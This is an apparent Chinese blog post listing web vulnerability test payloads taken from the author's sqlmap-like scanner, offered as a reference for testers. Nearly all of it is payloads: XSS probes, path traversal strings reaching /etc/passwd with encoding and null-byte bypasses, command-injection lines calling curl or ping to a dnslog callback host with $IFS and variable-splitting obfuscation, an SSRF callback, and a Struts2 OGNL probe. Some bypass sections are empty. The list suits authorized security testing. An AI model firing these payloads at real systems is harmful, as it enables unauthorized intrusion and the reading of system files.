WEB漏洞测试payload整理

常用web漏洞测试的payload整理，把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来，供大家测试时参考。

[反射型xss]

[在html形成]

" '>

[在js形成]

document.title="[random]";//
;document.title="[random]";//
";document.title="[random]";
';document.title="[random]";
");document.title="[random]";
');document.title="[random]";

[在html属性形成(img)]

888" οnlοad=document.title="[random]" a="
888' οnlοad=document.title="[random]" a='
888 οnlοad=document.title="[random]" 

[存储型xss]
[通用payload]
测试环境，需要在触发的地方查看payload显示情况

"'>
[Bypass on Event] [事件型绕过]
 #一般富文本不会过滤img标签
[Bypass pseudo protocol] [伪协议绕过]


[Bypass html5 tag] [html5标签绕过]


[Bypass html or js encode] [js编码，html编码，十进制编码绕过等]

[静态文件读取]
[常规检测]

/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/hosts     
/../../../../../../../C:/Windows/system.ini [windows]

[伪造绕过]

/././././././././././././././././././././././././../../../../../../../../etc/passwd      
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd     
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts 

[后缀绕过]

/../../../../../../../../../../../etc/passwd#
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd#.jpg
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd#.html
/../../../../../../../../../../../etc/passwd%00.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html

[命令执行漏洞]

[常规检测]

;curl [random].test.dnslog.link
 | curl [random].test.dnslog.link
 | ping -n 2 [random].test.dnslog.link [Windows]
 | ping -c 2 [random].test.dnslog.link  [Linux]

[绕过检测]

;curl [random].test.dnslog.link#
 | curl [random].test.dnslog.link#
%20|%20curl%20[random].test.dnslog.link
%20|%20curl%20[random].test.dnslog.link#
%20|%20ping%20-n%202%20[random].test.dnslog.link
%20|%20ping%20-c%202%20[random].test.dnslog.link#
a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
a=c;b=url;$a$b [random].test.dnslog.link#
${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link
a=c;b=url;$a$b{IFS}[random].test.dnslog.link#

[ssrf漏洞]

http://[random].test.dnslog.link/

[strust2命令执行]

?redirect:http://[random].test.dnslog.link/%25{3*4}